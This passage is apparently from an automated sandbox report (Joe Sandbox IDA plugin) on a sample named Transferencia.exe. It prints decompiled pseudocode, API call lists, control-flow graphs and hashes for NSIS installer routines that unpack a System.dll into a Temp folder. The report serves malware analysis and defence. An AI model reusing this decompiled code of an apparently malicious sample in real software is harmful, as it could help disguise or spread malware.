                                                						__eflags = _t93;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					__eflags = 0;
                                                					goto L24;
                                                				}
                                                			}































                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x0040308e
                                                0x00403094
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fc
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031f7
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403200
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x0040324e
                                                0x00403251
                                                0x00403264
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x004032ab
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x00403216
                                                0x0040321b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00403222
                                                0x00403225
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403125
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x0040312d
                                                0x00403132
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x0040313a
                                                0x00403141
                                                0x004031bd
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403152
                                                0x00403157
                                                0x00000000
                                                0x00000000
                                                0x00403159
                                                0x00403160
                                                0x00000000
                                                0x00000000
                                                0x00403162
                                                0x00403169
                                                0x00000000
                                                0x00000000
                                                0x0040316b
                                                0x00403172
                                                0x00000000
                                                0x00000000
                                                0x00403174
                                                0x0040317b
                                                0x00000000
                                                0x00000000
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403195
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a3
                                                0x004031a7
                                                0x004031af
                                                0x004031af
                                                0x004031b2
                                                0x004031b5
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x004031b7
                                                0x004031a9
                                                0x004031ad
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031cb
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Transferencia.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                                                  • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Transferencia.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                                                  • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                                                • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\Transferencia.exe,C:\Users\user\Desktop\Transferencia.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Transferencia.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                                                • API String ID: 2803837635-1956847086
                                                • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                                                • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                                                • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 40176f-401794 call 402da6 call 405e60 732 401796-40179c call 40651a 727->732 733 40179e-4017b0 call 40651a call 405de9 lstrcatW 727->733 738 4017b5-4017b6 call 4067a1 732->738 733->738 742 4017bb-4017bf 738->742 743 4017c1-4017cb call 406850 742->743 744 4017f2-4017f5 742->744 752 4017dd-4017ef 743->752 753 4017cd-4017db CompareFileTime 743->753 745 4017f7-4017f8 call 405fe5 744->745 746 4017fd-401819 call 40600a 744->746 745->746 754 40181b-40181e 746->754 755 40188d-4018b6 call 40557c call 4032b4 746->755 752->744 753->752 756 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 754->756 757 40186f-401879 call 40557c 754->757 769 4018b8-4018bc 755->769 770 4018be-4018ca SetFileTime 755->770 756->742 789 401864-401865 756->789 767 401882-401888 757->767 772 402c33 767->772 769->770 771 4018d0-4018db FindCloseChangeNotification 769->771 770->771 774 4018e1-4018e4 771->774 775 402c2a-402c2d 771->775 776 402c35-402c39 772->776 778 4018e6-4018f7 call 406557 lstrcatW 774->778 779 4018f9-4018fc call 406557 774->779 775->772 785 401901-402398 778->785 779->785 790 40239d-4023a2 785->790 791 402398 call 405b7a 785->791 789->767 792 401867-401868 789->792 790->776 791->790 792->757
                                                C-Code - Quality: 61%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E60( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
                                                				} else {
                                                					E0040651A();
                                                				}
                                                				E004067A1(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406850(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00405FE5(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E0040557C(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x7a8ae8;
                                                						goto L32;
                                                					} else {
                                                						E0040651A("C:\Users\jones\AppData\Local\Temp\nstC730.tmp", _t83);
                                                						E0040651A(_t83, _t81);
                                                						E00406557(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nstC730.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E0040651A(_t83, "C:\Users\jones\AppData\Local\Temp\nstC730.tmp");
                                                						_t64 = E00405B7A("C:\Users\jones\AppData\Local\Temp\nstC730.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E0040557C();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
                                                				 *0x7a8b14 =  *0x7a8b14 + 1;
                                                				_push(_t77);
                                                				_push(_t77);
                                                				_push( *(_t86 - 0x38));
                                                				_push( *((intOrPtr*)(_t86 - 0x28)));
                                                				_t45 = E004032B4(); // executed
                                                				 *0x7a8b14 =  *0x7a8b14 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B7A();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
                                                0x00401864
                                                0x00401865
                                                0x00401882
                                                0x00402c33
                                                0x00402c33
                                                0x00402c33
                                                0x00401867
                                                0x00401867
                                                0x00401868
                                                0x00401493
                                                0x0040239d
                                                0x0040239d
                                                0x0040239d
                                                0x00401865
                                                0x0040185e
                                                0x00402c35
                                                0x00402c39
                                                0x00402c39
                                                0x00401892
                                                0x00401897
                                                0x0040189d
                                                0x0040189e
                                                0x0040189f
                                                0x004018a2
                                                0x004018a5
                                                0x004018aa
                                                0x004018b0
                                                0x004018b4
                                                0x004018b6
                                                0x004018be
                                                0x004018ca
                                                0x004018b8
                                                0x004018b8
                                                0x004018bc
                                                0x00000000
                                                0x00000000
                                                0x004018bc
                                                0x004018d3
                                                0x004018d9
                                                0x004018db
                                                0x00000000
                                                0x004018e1
                                                0x004018e1
                                                0x004018e4
                                                0x004018fc
                                                0x004018e6
                                                0x004018e9
                                                0x004018f2
                                                0x004018f2
                                                0x00401901
                                                0x00401906
                                                0x00402398
                                                0x00000000
                                                0x00402398
                                                0x00000000

                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5
                                                  • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                                                  • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                                                  • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079F570,76CDEA30,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                                                  • Part of subcall function 0040557C: lstrcatW.KERNEL32(007A0F28,004033F5), ref: 004055D7
                                                  • Part of subcall function 0040557C: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004055E9
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                                                  • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nstC730.tmp$C:\Users\user\AppData\Local\Temp\nstC730.tmp\System.dll$Call
                                                • API String ID: 1941528284-3308602675
                                                • Opcode ID: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
                                                • Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
                                                • Opcode Fuzzy Hash: 7858d456fb03ccf9a4fc02aecf834b9d02d21675ab431890d9fa7e4538b0b482
                                                • Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 793 4032b4-4032cb 794 4032d4-4032dd 793->794 795 4032cd 793->795 796 4032e6-4032eb 794->796 797 4032df 794->797 795->794 798 4032fb-403308 call 4034ac 796->798 799 4032ed-4032f6 call 4034c2 796->799 797->796 803 40349a 798->803 804 40330e-403312 798->804 799->798 805 40349c-40349d 803->805 806 403445-403447 804->806 807 403318-40333e GetTickCount 804->807 810 4034a5-4034a9 805->810 808 403487-40348a 806->808 809 403449-40344c 806->809 811 4034a2 807->811 812 403344-40334c 807->812 813 40348c 808->813 814 40348f-403498 call 4034ac 808->814 809->811 815 40344e 809->815 811->810 816 403351-40335f call 4034ac 812->816 817 40334e 812->817 813->814 814->803 825 40349f 814->825 819 403451-403457 815->819 816->803 827 403365-40336e 816->827 817->816 822 403459 819->822 823 40345b-403469 call 4034ac 819->823 822->823 823->803 831 40346b-403477 call 4060bc 823->831 825->811 829 403374-403394 call 406a42 827->829 834 40339a-4033ad GetTickCount 829->834 835 40343d-40343f 829->835 837 403441-403443 831->837 838 403479-403483 831->838 839 4033f8-4033fa 834->839 840 4033af-4033b7 834->840 835->805 837->805 838->819 841 403485 838->841 844 403431-403435 839->844 845 4033fc-403400 839->845 842 4033b9-4033bd 840->842 843 4033bf-4033f0 MulDiv wsprintfW call 40557c 840->843 841->811 842->839 842->843 850 4033f5 843->850 844->812 846 40343b 844->846 848 403402-403409 call 4060bc 845->848 849 403417-403422 845->849 846->811 854 40340e-403410 848->854 852 403425-403429 849->852 850->839 852->829 853 40342f 852->853 853->811 854->837 855 403412-403415 854->855 855->852
                                                C-Code - Quality: 95%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t74;
                                                				long _t75;
                                                				intOrPtr _t76;
                                                				void* _t77;
                                                				int _t87;
                                                				intOrPtr _t91;
                                                				intOrPtr _t94;
                                                				long _t95;
                                                				signed int _t96;
                                                				int _t97;
                                                				int _t98;
                                                				intOrPtr _t99;
                                                				void* _t100;
                                                				void* _t101;
                                                
                                                				_t96 = _a16;
                                                				_t91 = _a12;
                                                				_v12 = _t96;
                                                				if(_t91 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t91;
                                                				if(_t91 == 0) {
                                                					_v16 = 0x797700;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034C2( *0x7a8ab8 + _t62);
                                                				}
                                                				if(E004034AC( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t91 != 0) {
                                                							if(_a16 < _t96) {
                                                								_t96 = _a16;
                                                							}
                                                							if(E004034AC(_t91, _t96) != 0) {
                                                								_v8 = _t96;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t91) {
                                                							goto L44;
                                                						}
                                                						_t87 = _v12;
                                                						while(1) {
                                                							_t97 = _a16;
                                                							if(_a16 >= _t87) {
                                                								_t97 = _t87;
                                                							}
                                                							if(E004034AC(0x793700, _t97) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E004060BC(_a8, 0x793700, _t97) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t97;
                                                							_a16 = _a16 - _t97;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40ce58 =  *0x40ce58 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce40 = 0xb;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t98 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t98 = _a16;
                                                						}
                                                						if(E004034AC(0x793700, _t98) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t98;
                                                						 *0x40ce30 = 0x793700;
                                                						 *0x40ce34 = _t98;
                                                						while(1) {
                                                							_t94 = _v16;
                                                							 *0x40ce38 = _t94;
                                                							 *0x40ce3c = _v12;
                                                							_t74 = E00406A42("Vly");
                                                							_v24 = _t74;
                                                							if(_t74 < 0) {
                                                								break;
                                                							}
                                                							_t99 =  *0x40ce38; // 0x79f570
                                                							_t100 = _t99 - _t94;
                                                							_t75 = GetTickCount();
                                                							_t95 = _t75;
                                                							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t101 = _t101 + 0xc;
                                                								E0040557C(0,  &_v152); // executed
                                                								_v20 = _t95;
                                                							}
                                                							if(_t100 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t76 =  *0x40ce38; // 0x79f570
                                                									_v8 = _v8 + _t100;
                                                									_v12 = _v12 - _t100;
                                                									_v16 = _t76;
                                                									L23:
                                                									if(_v24 != 4) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t77 = E004060BC(_a8, _v16, _t100); // executed
                                                								if(_t77 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t100;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}

























                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dd
                                                0x004032df
                                                0x004032df
                                                0x004032e6
                                                0x004032eb
                                                0x004032f6
                                                0x004032f6
                                                0x00403308
                                                0x0040349a
                                                0x0040349a
                                                0x00000000
                                                0x0040330e
                                                0x00403312
                                                0x00403447
                                                0x0040348a
                                                0x0040348c
                                                0x0040348c
                                                0x00403498
                                                0x0040349f
                                                0x004034a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403498
                                                0x0040344c
                                                0x00000000
                                                0x00000000
                                                0x0040344e
                                                0x00403451
                                                0x00403454
                                                0x00403457
                                                0x00403459
                                                0x00403459
                                                0x00403469
                                                0x00000000
                                                0x00000000
                                                0x00403477
                                                0x00403441
                                                0x00403441
                                                0x0040349c
                                                0x0040349c
                                                0x00000000
                                                0x0040349c
                                                0x00403479
                                                0x0040347c
                                                0x00403483
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403485
                                                0x00000000
                                                0x00403451
                                                0x0040331e
                                                0x00403320
                                                0x00403327
                                                0x00403327
                                                0x0040332e
                                                0x00403334
                                                0x0040333b
                                                0x0040333e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403344
                                                0x00403344
                                                0x00403344
                                                0x0040334c
                                                0x0040334e
                                                0x0040334e
                                                0x0040335f
                                                0x00000000
                                                0x00000000
                                                0x00403365
                                                0x00403368
                                                0x0040336e
                                                0x00403374
                                                0x00403374
                                                0x0040337f
                                                0x00403385
                                                0x0040338a
                                                0x00403391
                                                0x00403394
                                                0x00000000
                                                0x00000000
                                                0x0040339a
                                                0x004033a0
                                                0x004033a2
                                                0x004033ab
                                                0x004033ad
                                                0x004033de
                                                0x004033e4
                                                0x004033f0
                                                0x004033f5
                                                0x004033f5
                                                0x004033fa
                                                0x00403435
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004033fc
                                                0x00403400
                                                0x00403417
                                                0x0040341c
                                                0x0040341f
                                                0x00403422
                                                0x00403425
                                                0x00403429
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040342f
                                                0x00403409
                                                0x00403410
                                                0x00000000
                                                0x00000000
                                                0x00403412
                                                0x00000000
                                                0x00403412
                                                0x004033fa
                                                0x0040343d
                                                0x00000000
                                                0x0040343d
                                                0x00000000
                                                0x00403344

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: ... %d%%$Vly$Z8@
                                                • API String ID: 551687249-2471056181
                                                • Opcode ID: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                                                • Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
                                                • Opcode Fuzzy Hash: 67e296ff4565807106035eaab5f2577f851fd332784b09125895019d099d7f68
                                                • Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
